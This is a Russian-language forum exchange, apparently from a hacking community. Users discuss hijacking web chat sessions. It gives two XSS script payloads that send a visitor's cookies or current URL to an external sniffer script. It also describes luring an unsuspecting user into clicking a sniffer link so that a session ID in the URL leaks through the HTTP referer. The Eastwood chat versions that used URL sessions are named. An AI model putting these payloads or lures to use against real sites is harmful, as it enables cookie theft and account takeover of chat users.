Ну воТ! снифер получат куки < script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> это я сно но а сесли чат как такого работает не через куки ну а хотя бы по сэссиям... тоесть присваивает каждому юзеру сэссию... непомню где видел... но чатов таких много! я думаю покатит и такой ХОД:

< script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+location.href;</script>

любой webчат идентифицирует юзеров либо чере куки либо через get/post запросы (либо и то и другое, но в этом случае они чаще друг друга дополнялют)

если чта передает ID сессии через URL то можно просто выкинуть ссылку на снифер в чат, какойнить лошок кликнет и его IDшник уплывет в переменной HTTP_REFERER =) БЕЗ ВСЯКИХ СКРИПТОВ!

ХМ.! ну это понятно! но для этого нужны тэги! а тэги как такого в нормльных чатах фильтруются! вот и ссылка уже не проходит! я почему написал это потому что встретился с этой проблемой  в чате Eastwood  него до версии 5-56 работал чат через сэссии! выше версии начали работать через куки!